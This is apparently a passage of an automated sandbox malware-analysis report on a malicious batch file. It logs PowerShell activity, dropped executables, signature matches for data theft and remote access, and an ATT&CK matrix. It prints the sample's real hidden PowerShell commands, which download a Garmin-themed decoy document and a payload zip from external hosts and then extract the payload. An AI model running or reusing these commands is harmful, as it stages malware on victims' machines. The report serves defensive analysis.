                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4655Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5224Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4161Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2778Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3291Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6557Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3809Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5361Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\tcl\reg1.3\tclreg13.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Scripts\pip3.12.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Scripts\wsdump.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\tcl\nmake\x86_64-w64-mingw32-nmakehlp.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\tcl\dde1.4\tcldde14.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Scripts\normalizer.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Scripts\pip3.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Scripts\pip.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep count: 4655 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7716Thread sleep count: 5224 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep count: 4161 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep count: 2778 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7976Thread sleep count: 3291 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7976Thread sleep count: 6557 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4312Thread sleep count: 3809 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4312Thread sleep count: 5361 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep time: -23058430092136925s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: powershell.exe, 0000000D.00000002.2871853328.0000028C23674000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: powershell.exe, 0000000B.00000002.1745510882.000001C965510000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: amsi64_7676.amsi.csv, type: OTHER
                Source: Yara matchFile source: amsi64_7928.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7676, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7928, type: MEMORYSTR
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\hnskdfgjgar22.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\hnskdfgjgar22.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\hnskdfgjgar22.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\hnskdfgjgar22.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx'"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/awsr/ga/-/raw/main/FGA2112.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/garmin_campaign_information_for_partners_v15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'c:\users\user\appdata\local\temp\\garmin_campaign_information_for_partners_v15.docx')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/awsr/ga/-/raw/main/fga2112.zip', 'c:\users\public\document.zip')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/garmin_campaign_information_for_partners_v15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'c:\users\user\appdata\local\temp\\garmin_campaign_information_for_partners_v15.docx')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/awsr/ga/-/raw/main/fga2112.zip', 'c:\users\public\document.zip')"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: amsi64_7928.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7928, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: amsi64_7928.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7928, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information11
                Scripting
                Valid Accounts1
                Command and Scripting Interpreter
                11
                Scripting
                11
                Process Injection
                1
                Masquerading
                OS Credential Dumping11
                Security Software Discovery
                Remote Services1
